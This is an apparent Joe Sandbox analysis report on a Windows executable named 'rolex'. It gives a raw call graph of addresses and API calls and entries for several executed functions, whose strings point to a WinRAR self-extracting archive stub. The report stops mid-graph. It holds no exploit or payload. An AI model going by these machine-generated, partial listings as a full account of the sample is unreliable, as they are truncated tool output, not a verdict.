27920 7ff7ab4cd997 27919->27920 27924 7ff7ab4cd95b _invalid_parameter_noinfo 27919->27924 27926 7ff7ab4cd69c 15 API calls _invalid_parameter_noinfo 27920->27926 27922 7ff7ab4cd97e RtlAllocateHeap 27923 7ff7ab4cd995 27922->27923 27922->27924 27924->27920 27924->27922 27925 7ff7ab4cbbc0 _invalid_parameter_noinfo 2 API calls 27924->27925 27925->27924 27926->27923 27927 7ff7ab4cbdf8 27928 7ff7ab4cbe1e GetModuleHandleW 27927->27928 27929 7ff7ab4cbe68 27927->27929 27928->27929 27932 7ff7ab4cbe2b 27928->27932 27944 7ff7ab4cf398 EnterCriticalSection 27929->27944 27932->27929 27945 7ff7ab4cbfb0 GetModuleHandleExW 27932->27945 27946 7ff7ab4cc001 27945->27946 27947 7ff7ab4cbfda GetProcAddress 27945->27947 27949 7ff7ab4cc011 27946->27949 27950 7ff7ab4cc00b FreeLibrary 27946->27950 27947->27946 27948 7ff7ab4cbff4 27947->27948 27948->27946 27949->27929 27950->27949 27951 7ff7ab4c2d6c 27976 7ff7ab4c27fc 27951->27976 27954 7ff7ab4c2eb8 28075 7ff7ab4c3170 7 API calls 2 library calls 27954->28075 27955 7ff7ab4c2d88 __scrt_acquire_startup_lock 27957 7ff7ab4c2ec2 27955->27957 27958 7ff7ab4c2da6 27955->27958 28076 7ff7ab4c3170 7 API calls 2 library calls 27957->28076 27960 7ff7ab4c2dcb 27958->27960 27966 7ff7ab4c2de8 __scrt_release_startup_lock 27958->27966 27984 7ff7ab4ccd90 27958->27984 27962 7ff7ab4c2ecd abort 27963 7ff7ab4c2e51 27988 7ff7ab4c32bc 27963->27988 27965 7ff7ab4c2e56 27991 7ff7ab4ccd20 27965->27991 27966->27963 28072 7ff7ab4cc050 35 API calls __GSHandlerCheck_EH 27966->28072 28077 7ff7ab4c2fb0 27976->28077 27979 7ff7ab4c282b 28079 7ff7ab4ccc50 27979->28079 27983 7ff7ab4c2827 27983->27954 27983->27955 27985 7ff7ab4ccdeb 27984->27985 27986 7ff7ab4ccdcc 27984->27986 27985->27966 27986->27985 28096 7ff7ab491120 27986->28096 27989 7ff7ab4c3cf0 memcpy_s 27988->27989 27990 7ff7ab4c32d3 GetStartupInfoW 27989->27990 27990->27965 28102 7ff7ab4d0730 27991->28102 27993 7ff7ab4ccd2f 27994 7ff7ab4c2e5e 27993->27994 28106 7ff7ab4d0ac0 35 API calls _snwprintf 27993->28106 27996 7ff7ab4c0754 27994->27996 28108 7ff7ab4adfd0 27996->28108 27999 7ff7ab4a62dc 35 API calls 28000 7ff7ab4c079a 27999->28000 28185 7ff7ab4b946c 28000->28185 28002 7ff7ab4c07a4 memcpy_s 28190 7ff7ab4b9a14 28002->28190 28004 7ff7ab4c096e GetCommandLineW 28008 7ff7ab4c0980 28004->28008 28047 7ff7ab4c0b42 28004->28047 28005 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 28007 7ff7ab4c0de2 28005->28007 28006 7ff7ab4c0819 28006->28004 28054 7ff7ab4c0ddc 28006->28054 28011 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 28007->28011 28013 7ff7ab49129c 33 API calls 28008->28013 28009 7ff7ab4a6454 34 API calls 28010 7ff7ab4c0b51 28009->28010 28014 7ff7ab491fa0 31 API calls 28010->28014 28017 7ff7ab4c0b68 memcpy_s 28010->28017 28012 7ff7ab4c0de8 28011->28012 28019 7ff7ab4c1900 _com_raise_error 14 API calls 28012->28019 28016 7ff7ab4c09a5 28013->28016 28014->28017 28015 7ff7ab491fa0 31 API calls 28018 7ff7ab4c0b93 SetEnvironmentVariableW GetLocalTime 28015->28018 28200 7ff7ab4bcad0 28016->28200 28017->28015 28021 7ff7ab4a3e28 swprintf 46 API calls 28018->28021 28022 7ff7ab4c0e34 28019->28022 28024 7ff7ab4c0c18 SetEnvironmentVariableW GetModuleHandleW LoadIconW 28021->28024 28023 7ff7ab4c09af 28023->28007 28025 7ff7ab4c09f9 OpenFileMappingW 28023->28025 28026 7ff7ab4c0adb 28023->28026 28218 7ff7ab4bb014 LoadBitmapW 28024->28218 28028 7ff7ab4c0ad0 CloseHandle 28025->28028 28029 7ff7ab4c0a19 MapViewOfFile 28025->28029 28033 7ff7ab49129c 33 API calls 28026->28033 28028->28047 28029->28028 28031 7ff7ab4c0a3f UnmapViewOfFile MapViewOfFile 28029->28031 28031->28028 28034 7ff7ab4c0a71 28031->28034 28037 7ff7ab4c0b00 28033->28037 28275 7ff7ab4ba190 33 API calls 2 library calls 28034->28275 28035 7ff7ab4c0c75 28242 7ff7ab4b67b4 28035->28242 28281 7ff7ab4bfd0c 35 API calls 2 library calls 28037->28281 28041 7ff7ab4c0a81 28276 7ff7ab4bfd0c 35 API calls 2 library calls 28041->28276 28042 7ff7ab4b67b4 33 API calls 28045 7ff7ab4c0c87 DialogBoxParamW 28042->28045 28043 7ff7ab4c0b0a 28043->28047 28049 7ff7ab4c0dd7 28043->28049 28055 7ff7ab4c0cd3 28045->28055 28046 7ff7ab4c0a90 28048 7ff7ab4ab9b4 102 API calls 28046->28048 28047->28009 28050 7ff7ab4c0aa5 28048->28050 28051 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 28049->28051 28277 7ff7ab4abb00 28050->28277 28051->28054 28053 7ff7ab4c0ab8 28058 7ff7ab4c0ac7 UnmapViewOfFile 28053->28058 28054->28005 28056 7ff7ab4c0ce6 Sleep 28055->28056 28057 7ff7ab4c0cec 28055->28057 28056->28057 28059 7ff7ab4c0cfa 28057->28059 28245 7ff7ab4b9f4c 28057->28245 28058->28028 28061 7ff7ab4c0d06 DeleteObject 28059->28061 28062 7ff7ab4c0d1f DeleteObject 28061->28062 28063 7ff7ab4c0d25 28061->28063 28062->28063 28064 7ff7ab4c0d6d 28063->28064 28065 7ff7ab4c0d5b 28063->28065 28271 7ff7ab4b94e4 28064->28271 28066 7ff7ab4bfe24 5 API calls 28065->28066 28067 7ff7ab4c0d60 CloseHandle 28066->28067 28067->28064 28072->27963 28075->27957 28076->27962 28078 7ff7ab4c281e __scrt_dllmain_crt_thread_attach 28077->28078 28078->27979 28078->27983 28080 7ff7ab4d0d4c 28079->28080 28081 7ff7ab4c2830 28080->28081 28084 7ff7ab4cec00 28080->28084 28081->27983 28083 7ff7ab4c51a0 7 API calls 2 library calls 28081->28083 28083->27983 28095 7ff7ab4cf398 EnterCriticalSection 28084->28095 28097 7ff7ab4991c8 35 API calls 28096->28097 28098 7ff7ab491130 28097->28098 28101 7ff7ab4c29bc 34 API calls 28098->28101 28100 7ff7ab4c2a01 28100->27986 28101->28100 28103 7ff7ab4d0749 28102->28103 28104 7ff7ab4d073d 28102->28104 28103->27993 28107 7ff7ab4d0570 48 API calls 4 library calls 28104->28107 28106->27993 28107->28103 28282 7ff7ab4c2450 28108->28282 28111 7ff7ab4ae026 GetProcAddress 28113 7ff7ab4ae053 GetProcAddress 28111->28113 28114 7ff7ab4ae03b 28111->28114 28112 7ff7ab4ae07b 28115 7ff7ab4ae503 28112->28115 28289 7ff7ab4cb788 39 API calls 2 library calls 28112->28289 28113->28112 28117 7ff7ab4ae068 28113->28117 28114->28113 28116 7ff7ab4a6454 34 API calls 28115->28116 28119 7ff7ab4ae50c 28116->28119 28117->28112 28121 7ff7ab4a7df4 47 API calls 28119->28121 28120 7ff7ab4ae3b0 28120->28115 28122 7ff7ab4ae3ba 28120->28122 28150 7ff7ab4ae51a 28121->28150 28123 7ff7ab4a6454 34 API calls 28122->28123 28124 7ff7ab4ae3c3 CreateFileW 28123->28124 28125 7ff7ab4ae4f0 CloseHandle 28124->28125 28126 7ff7ab4ae403 SetFilePointer 28124->28126 28129 7ff7ab491fa0 31 API calls 28125->28129 28126->28125 28128 7ff7ab4ae41c ReadFile 28126->28128 28128->28125 28130 7ff7ab4ae444 28128->28130 28129->28115 28131 7ff7ab4ae800 28130->28131 28132 7ff7ab4ae458 28130->28132 28298 7ff7ab4c2624 8 API calls 28131->28298 28137 7ff7ab49129c 33 API calls 28132->28137 28134 7ff7ab49129c 33 API calls 28134->28150 28135 7ff7ab4ae805 28136 7ff7ab4ae53e CompareStringW 28136->28150 28143 7ff7ab4ae48f 28137->28143 28138 7ff7ab4a8090 47 API calls 28138->28150 28139 7ff7ab491fa0 31 API calls 28139->28150 28141 7ff7ab4ae7c2 28145 7ff7ab491fa0 31 API calls 28141->28145 28142 7ff7ab4ae648 28294 7ff7ab4a7eb0 47 API calls 28142->28294 28147 7ff7ab4ae4db 28143->28147 28290 7ff7ab4ad0a0 28143->28290 28149 7ff7ab4ae7cb 28145->28149 28146 7ff7ab4a32bc 51 API calls 28146->28150 28151 7ff7ab491fa0 31 API calls 28147->28151 28148 7ff7ab4ae651 28153 7ff7ab4a51a4 9 API calls 28148->28153 28155 7ff7ab491fa0 31 API calls 28149->28155 28150->28134 28150->28136 28150->28138 28150->28139 28150->28146 28158 7ff7ab4ae5cc 28150->28158 28284 7ff7ab4a51a4 28150->28284 28152 7ff7ab4ae4e5 28151->28152 28156 7ff7ab491fa0 31 API calls 28152->28156 28157 7ff7ab4ae656 28153->28157 28154 7ff7ab49129c 33 API calls 28154->28158 28159 7ff7ab4ae7d5 28155->28159 28156->28125 28160 7ff7ab4ae706 28157->28160 28167 7ff7ab4ae661 28157->28167 28158->28154 28161 7ff7ab4a8090 47 API calls 28158->28161 28166 7ff7ab491fa0 31 API calls 28158->28166 28169 7ff7ab4a32bc 51 API calls 28158->28169 28175 7ff7ab4ae63a 28158->28175 28162 7ff7ab4c2320 _handle_error 8 API calls 28159->28162 28163 7ff7ab4ada98 48 API calls 28160->28163 28161->28158 28164 7ff7ab4ae7e4 28162->28164 28165 7ff7ab4ae74b AllocConsole 28163->28165 28164->27999 28168 7ff7ab4ae755 GetCurrentProcessId AttachConsole 28165->28168 28184 7ff7ab4ae6fb 28165->28184 28166->28158 28171 7ff7ab4aaae0 48 API calls 28167->28171 28174 7ff7ab4ae76c 28168->28174 28169->28158 28173 7ff7ab4ae6a5 28171->28173 28172 7ff7ab4ae7b9 ExitProcess 28176 7ff7ab4ada98 48 API calls 28173->28176 28177 7ff7ab4ae778 GetStdHandle WriteConsoleW Sleep FreeConsole 28174->28177 28175->28141 28175->28142 28178 7ff7ab4ae6c3 28176->28178 28177->28184 28179 7ff7ab4aaae0 48 API calls 28178->28179 28180 7ff7ab4ae6ce 28179->28180 28295 7ff7ab4adc2c 33 API calls 28180->28295 28182 7ff7ab4ae6da 28296 7ff7ab4919e0 31 API calls _invalid_parameter_noinfo_noreturn 28182->28296 28297 7ff7ab4919e0 31 API calls _invalid_parameter_noinfo_noreturn 28184->28297 28186 7ff7ab4add88 28185->28186 28187 7ff7ab4b9481 OleInitialize 28186->28187 28188 7ff7ab4b94a7 28187->28188 28189 7ff7ab4b94cd SHGetMalloc 28188->28189 28189->28002 28191 7ff7ab4b9a49 28190->28191 28193 7ff7ab4b9a4e memcpy_s 28190->28193 28192 7ff7ab491fa0 31 API calls 28191->28192 28192->28193 28194 7ff7ab491fa0 31 API calls 28193->28194 28195 7ff7ab4b9a7d memcpy_s 28193->28195 28194->28195 28196 7ff7ab491fa0 31 API calls 28195->28196 28198 7ff7ab4b9aac memcpy_s 28195->28198 28196->28198 28197 7ff7ab491fa0 31 API calls 28199 7ff7ab4b9adb memcpy_s 28197->28199 28198->28197 28198->28199 28199->28006 28201 7ff7ab4ad0a0 33 API calls 28200->28201 28216 7ff7ab4bcb1f memcpy_s 28201->28216 28202 7ff7ab4bcd8b 28203 7ff7ab4bcdbe 28202->28203 28205 7ff7ab4bcde4 28202->28205 28204 7ff7ab4c2320 _handle_error 8 API calls 28203->28204 28206 7ff7ab4bcdcf 28204->28206 28208 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 28205->28208 28206->28023 28207 7ff7ab4ad0a0 33 API calls 28207->28216 28209 7ff7ab4bcde9 28208->28209 28299 7ff7ab49704c 47 API calls memcpy_s 28209->28299 28210 7ff7ab4bcdef 28300 7ff7ab49704c 47 API calls memcpy_s 28210->28300 28212 7ff7ab49129c 33 API calls 28212->28216 28214 7ff7ab4bcdf5 28215 7ff7ab4abb00 102 API calls 28215->28216 28216->28202 28216->28205 28216->28207 28216->28209 28216->28210 28216->28212 28216->28215 28217 7ff7ab491fa0 31 API calls 28216->28217 28217->28216 28219 7ff7ab4bb046 28218->28219 28220 7ff7ab4bb03e 28218->28220 28222 7ff7ab4bb063 28219->28222 28223 7ff7ab4bb04e GetObjectW 28219->28223 28301 7ff7ab4b8624 FindResourceW 28220->28301 28224 7ff7ab4b849c 4 API calls 28222->28224 28223->28222 28225 7ff7ab4bb078 28224->28225 28226 7ff7ab4bb0ce 28225->28226 28227 7ff7ab4bb09e 28225->28227 28228 7ff7ab4b8624 10 API calls 28225->28228 28237 7ff7ab4a98ac 28226->28237 28315 7ff7ab4b8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28227->28315 28230 7ff7ab4bb08a 28228->28230 28230->28227 28232 7ff7ab4bb092 DeleteObject 28230->28232 28231 7ff7ab4bb0a7 28233 7ff7ab4b84cc 4 API calls 28231->28233 28232->28227 28234 7ff7ab4bb0b2 28233->28234 28316 7ff7ab4b8df4 16 API calls _handle_error 28234->28316 28236 7ff7ab4bb0bf DeleteObject 28236->28226 28317 7ff7ab4a98dc 28237->28317 28239 7ff7ab4a98ba 28384 7ff7ab4aa43c GetModuleHandleW FindResourceW 28239->28384 28241 7ff7ab4a98c2 28241->28035 28243 7ff7ab4c21d0 33 API calls 28242->28243 28244 7ff7ab4b67fa 28243->28244 28244->28042 28246 7ff7ab4b9f92 28245->28246 28262 7ff7ab4b9ffe 28245->28262 28247 7ff7ab49129c 33 API calls 28246->28247 28249 7ff7ab4b9fbc 28247->28249 28248 7ff7ab491fa0 31 API calls 28250 7ff7ab4ba019 28248->28250 28251 7ff7ab4a7df4 47 API calls 28249->28251 28253 7ff7ab4a7fc4 SetCurrentDirectoryW 28250->28253 28267 7ff7ab4ba156 28250->28267 28270 7ff7ab4ba189 28250->28270 28256 7ff7ab4b9fd0 28251->28256 28252 7ff7ab4c2320 _handle_error 8 API calls 28254 7ff7ab4ba167 28252->28254 28255 7ff7ab4ba074 28253->28255 28254->28059 28257 7ff7ab498d04 33 API calls 28255->28257 28407 7ff7ab4b13f4 CompareStringW 28256->28407 28260 7ff7ab4ba0a3 28257->28260 28258 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 28261 7ff7ab4ba18f 28258->28261 28263 7ff7ab4ba0ae 28260->28263 28408 7ff7ab491744 33 API calls 4 library calls 28260->28408 28262->28248 28262->28250 28264 7ff7ab4ba0dd SHFileOperationW 28263->28264 28266 7ff7ab4ba129 28264->28266 28264->28267 28266->28267 28268 7ff7ab4ba184 28266->28268 28267->28252 28269 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 28268->28269 28269->28270 28270->28258 28272 7ff7ab4b9501 28271->28272 28273 7ff7ab4b950a OleUninitialize 28272->28273 28274 7ff7ab4fe330 28273->28274 28275->28041 28276->28046 28279 7ff7ab4abb1f 28277->28279 28278 7ff7ab4abb5b 28278->28053 28279->28278 28280 7ff7ab4ab96c 102 API calls 28279->28280 28280->28278 28281->28043 28283 7ff7ab4adff4 GetModuleHandleW 28282->28283 28283->28111 28283->28112 28285 7ff7ab4a51c8 GetVersionExW 28284->28285 28286 7ff7ab4a51fb 28284->28286 28285->28286 28287 7ff7ab4c2320 _handle_error 8 API calls 28286->28287 28288 7ff7ab4a5228 28287->28288 28288->28150 28289->28120 28293 7ff7ab4ad0d2 28290->28293 28291 7ff7ab4ad106 28291->28143 28292 7ff7ab491744 33 API calls 28292->28293 28293->28291 28293->28292 28294->28148 28295->28182 28296->28184 28297->28172 28298->28135 28299->28210 28300->28214 28302 7ff7ab4b864f SizeofResource 28301->28302 28307 7ff7ab4b879b 28301->28307 28303 7ff7ab4b8669 LoadResource 28302->28303 28302->28307 28304 7ff7ab4b8682 LockResource 28303->28304 28303->28307 28305 7ff7ab4b8697 GlobalAlloc 28304->28305 28304->28307 28306 7ff7ab4b86b8 GlobalLock 28305->28306 28305->28307 28308 7ff7ab4b8792 GlobalFree 28306->28308 28309 7ff7ab4b86ca memcpy_s 28306->28309 28307->28219 28308->28307 28310 7ff7ab4b86f6 GdipAlloc 28309->28310 28311 7ff7ab4b8789 GlobalUnlock 28309->28311 28312 7ff7ab4b870b 28310->28312 28311->28308 28312->28311 28313 7ff7ab4b8772 28312->28313 28314 7ff7ab4b875a GdipCreateHBITMAPFromBitmap 28312->28314 28313->28311 28314->28313 28315->28231 28316->28236 28320 7ff7ab4a98fe _snwprintf 28317->28320 28318 7ff7ab4a9973 28394 7ff7ab4a68b0 48 API calls 28318->28394 28320->28318 28321 7ff7ab4a9a89 28320->28321 28324 7ff7ab4a99fd 28321->28324 28326 7ff7ab4920b0 33 API calls 28321->28326 28322 7ff7ab491fa0 31 API calls 28322->28324 28323 7ff7ab4a997d memcpy_s 28323->28322 28382 7ff7ab4aa42e 28323->28382 28328 7ff7ab4a24c0 54 API calls 28324->28328 28325 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 28327 7ff7ab4aa434 28325->28327 28326->28324 28330 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 28327->28330 28329 7ff7ab4a9a1a 28328->28329 28331 7ff7ab4a9a22 28329->28331 28339 7ff7ab4a9aad 28329->28339 28332 7ff7ab4aa43a 28330->28332 28333 7ff7ab4a204c 100 API calls 28331->28333 28336 7ff7ab4a9a2b 28333->28336 28334 7ff7ab4a9b17 28386 7ff7ab4ca450 28334->28386 28336->28327 28338 7ff7ab4a9a66 28336->28338 28341 7ff7ab4c2320 _handle_error 8 API calls 28338->28341 28339->28334 28342 7ff7ab4a8e58 33 API calls 28339->28342 28340 7ff7ab4ca450 31 API calls 28354 7ff7ab4a9b57 __vcrt_FlsAlloc 28340->28354 28343 7ff7ab4aa40e 28341->28343 28342->28339 28343->28239 28344 7ff7ab4a9c89 28345 7ff7ab4a2aa0 101 API calls 28344->28345 28357 7ff7ab4a9d5c 28344->28357 28348 7ff7ab4a9ca1 28345->28348 28346 7ff7ab4a2bb0 101 API calls 28346->28354 28347 7ff7ab4a28d0 104 API calls 28347->28354 28351 7ff7ab4a28d0 104 API calls 28348->28351 28348->28357 28349 7ff7ab4a2aa0 101 API calls 28349->28354 28350 7ff7ab4a204c 100 API calls 28352 7ff7ab4aa3f5 28350->28352 28355 7ff7ab4a9cc9 28351->28355 28353 7ff7ab491fa0 31 API calls 28352->28353 28353->28338 28354->28344 28354->28346 28354->28347 28354->28349 28354->28357 28355->28357 28363 7ff7ab4a9cd7 __vcrt_FlsAlloc 28355->28363 28395 7ff7ab4b0bbc MultiByteToWideChar 28355->28395 28357->28350 28358 7ff7ab4aa1ec 28374 7ff7ab4aa2c2 28358->28374 28401 7ff7ab4ccf90 31 API calls 2 library calls 28358->28401 28360 7ff7ab4aa157 28360->28358 28398 7ff7ab4ccf90 31 API calls 2 library calls 28360->28398 28361 7ff7ab4aa14b 28361->28239 28363->28357 28363->28358 28363->28360 28363->28361 28378 7ff7ab4aa429 28363->28378 28379 7ff7ab4b0f68 WideCharToMultiByte 28363->28379 28396 7ff7ab4aaa88 45 API calls 2 library calls 28363->28396 28397 7ff7ab4ca270 31 API calls 2 library calls 28363->28397 28365 7ff7ab4aa3a2 28368 7ff7ab4ca450 31 API calls 28365->28368 28366 7ff7ab4aa249 28402 7ff7ab4cb7bc 31 API calls _invalid_parameter_noinfo_noreturn 28366->28402 28367 7ff7ab4aa2ae 28367->28374 28403 7ff7ab4a8cd0 33 API calls 2 library calls 28367->28403 28370 7ff7ab4aa3cb 28368->28370 28372 7ff7ab4ca450 31 API calls 28370->28372 28371 7ff7ab4a8e58 33 API calls 28371->28374 28372->28357 28374->28365 28374->28371 28375 7ff7ab4aa16d 28399 7ff7ab4cb7bc 31 API calls _invalid_parameter_noinfo_noreturn 28375->28399 28376 7ff7ab4aa1d8 28376->28358 28400 7ff7ab4a8cd0 33 API calls 2 library calls 28376->28400 28404 7ff7ab4c2624 8 API calls 28378->28404 28379->28363 28382->28325 28385 7ff7ab4aa468 28384->28385 28385->28241 28387 7ff7ab4ca47d 28386->28387 28393 7ff7ab4ca492 28387->28393 28405 7ff7ab4cd69c 15 API calls _invalid_parameter_noinfo 28387->28405 28389 7ff7ab4ca487 28406 7ff7ab4c78e4 31 API calls _invalid_parameter_noinfo 28389->28406 28390 7ff7ab4c2320 _handle_error 8 API calls 28392 7ff7ab4a9b37 28390->28392 28392->28340 28393->28390 28394->28323 28395->28363 28396->28363 28397->28363 28398->28375 28399->28376 28400->28358 28401->28366 28402->28367 28403->28374 28404->28382 28405->28389 28406->28393 28407->28262 28408->28264 28409 7ff7ab4c154b 28410 7ff7ab4c14a2 28409->28410 28411 7ff7ab4c1900 _com_raise_error 14 API calls 28410->28411 28412 7ff7ab4c14e1 28411->28412

                                                                                Executed Functions

                                                                                Function 00007FF7AB4BB190 Relevance: 125.7, APIs: 61, Strings: 10, Instructions: 1421windowfilesleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleIdleInputLineMappingParamShellSleepTickTranslateUnmapWaitWindow
                                                                                • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                                                • API String ID: 2128803032-2702805183
                                                                                • Opcode ID: 44c66d4143957b758382f86cfa4081ed6d928b54fc22ddb9a7340f649bf70bb4
                                                                                • Instruction ID: fdba8a4c4d8875d52f6723824b07296e9edc83b634d9e8cbeb952fc021723e7b
                                                                                • Opcode Fuzzy Hash: 44c66d4143957b758382f86cfa4081ed6d928b54fc22ddb9a7340f649bf70bb4
                                                                                • Instruction Fuzzy Hash: 96D28662A0F78291EA20BB7DE8546F9A361EF85B80FC24135DA4D076B6DF3DE544C720
                                                                                Function 00007FF7AB4BCE88 Relevance: 66.7, APIs: 27, Strings: 10, Instructions: 1963fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFile$ButtonCheckedMove$DialogItemOperationPathTemp
                                                                                • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                                                • API String ID: 2285161090-3916287355
                                                                                • Opcode ID: e530fa976c247d03843a71bdcb8ea7d5b705ef19b124f0053bbcc44abdb5d3bc
                                                                                • Instruction ID: efc2e8aa5903ceb3c1aaf1cea86fe8ca93c4f906e7a6f784797df8be23423385
                                                                                • Opcode Fuzzy Hash: e530fa976c247d03843a71bdcb8ea7d5b705ef19b124f0053bbcc44abdb5d3bc
                                                                                • Instruction Fuzzy Hash: 3813A022B06B8295EB10EFB8D8402EC67B1EB44798F820535DB5D17AF9DF38E595C360
                                                                                Function 00007FF7AB4C0754 Relevance: 45.9, APIs: 21, Strings: 5, Instructions: 380filesleeptimeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1462 7ff7ab4c0754-7ff7ab4c0829 call 7ff7ab4adfd0 call 7ff7ab4a62dc call 7ff7ab4b946c call 7ff7ab4c3cf0 call 7ff7ab4b9a14 1473 7ff7ab4c0860-7ff7ab4c0883 1462->1473 1474 7ff7ab4c082b-7ff7ab4c0840 1462->1474 1477 7ff7ab4c0885-7ff7ab4c089a 1473->1477 1478 7ff7ab4c08ba-7ff7ab4c08dd 1473->1478 1475 7ff7ab4c0842-7ff7ab4c0855 1474->1475 1476 7ff7ab4c085b call 7ff7ab4c220c 1474->1476 1475->1476 1479 7ff7ab4c0ddd-7ff7ab4c0de2 call 7ff7ab4c7904 1475->1479 1476->1473 1481 7ff7ab4c08b5 call 7ff7ab4c220c 1477->1481 1482 7ff7ab4c089c-7ff7ab4c08af 1477->1482 1483 7ff7ab4c08df-7ff7ab4c08f4 1478->1483 1484 7ff7ab4c0914-7ff7ab4c0937 1478->1484 1499 7ff7ab4c0de3-7ff7ab4c0e2f call 7ff7ab4c7904 call 7ff7ab4c1900 1479->1499 1481->1478 1482->1479 1482->1481 1485 7ff7ab4c090f call 7ff7ab4c220c 1483->1485 1486 7ff7ab4c08f6-7ff7ab4c0909 1483->1486 1487 7ff7ab4c0939-7ff7ab4c094e 1484->1487 1488 7ff7ab4c096e-7ff7ab4c097a GetCommandLineW 1484->1488 1485->1484 1486->1479 1486->1485 1492 7ff7ab4c0950-7ff7ab4c0963 1487->1492 1493 7ff7ab4c0969 call 7ff7ab4c220c 1487->1493 1495 7ff7ab4c0980-7ff7ab4c09aa call 7ff7ab4c797c call 7ff7ab49129c call 7ff7ab4bcad0 1488->1495 1496 7ff7ab4c0b47-7ff7ab4c0b5e call 7ff7ab4a6454 1488->1496 1492->1479 1492->1493 1493->1488 1519 7ff7ab4c09af-7ff7ab4c09b7 1495->1519 1504 7ff7ab4c0b60-7ff7ab4c0b85 call 7ff7ab491fa0 call 7ff7ab4c3640 1496->1504 1505 7ff7ab4c0b89-7ff7ab4c0ce4 call 7ff7ab491fa0 SetEnvironmentVariableW GetLocalTime call 7ff7ab4a3e28 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff7ab4bb014 call 7ff7ab4a98ac call 7ff7ab4b67b4 * 2 DialogBoxParamW call 7ff7ab4b68a8 * 2 1496->1505 1518 7ff7ab4c0e34-7ff7ab4c0e6a 1499->1518 1504->1505 1568 7ff7ab4c0ce6 Sleep 1505->1568 1569 7ff7ab4c0cec-7ff7ab4c0cf3 1505->1569 1524 7ff7ab4c0e6c 1518->1524 1520 7ff7ab4c09b9-7ff7ab4c09cc 1519->1520 1521 7ff7ab4c09ec-7ff7ab4c09f3 1519->1521 1525 7ff7ab4c09e7 call 7ff7ab4c220c 1520->1525 1526 7ff7ab4c09ce-7ff7ab4c09e1 1520->1526 1527 7ff7ab4c09f9-7ff7ab4c0a13 OpenFileMappingW 1521->1527 1528 7ff7ab4c0adb-7ff7ab4c0b12 call 7ff7ab4c797c call 7ff7ab49129c call 7ff7ab4bfd0c 1521->1528 1524->1524 1525->1521 1526->1499 1526->1525 1532 7ff7ab4c0ad0-7ff7ab4c0ad9 CloseHandle 1527->1532 1533 7ff7ab4c0a19-7ff7ab4c0a39 MapViewOfFile 1527->1533 1528->1496 1551 7ff7ab4c0b14-7ff7ab4c0b27 1528->1551 1532->1496 1533->1532 1536 7ff7ab4c0a3f-7ff7ab4c0a6f UnmapViewOfFile MapViewOfFile 1533->1536 1536->1532 1539 7ff7ab4c0a71-7ff7ab4c0aca call 7ff7ab4ba190 call 7ff7ab4bfd0c call 7ff7ab4ab9b4 call 7ff7ab4abb00 call 7ff7ab4abb70 UnmapViewOfFile 1536->1539 1539->1532 1554 7ff7ab4c0b42 call 7ff7ab4c220c 1551->1554 1555 7ff7ab4c0b29-7ff7ab4c0b3c 1551->1555 1554->1496 1555->1554 1558 7ff7ab4c0dd7-7ff7ab4c0ddc call 7ff7ab4c7904 1555->1558 1558->1479 1568->1569 1571 7ff7ab4c0cf5 call 7ff7ab4b9f4c 1569->1571 1572 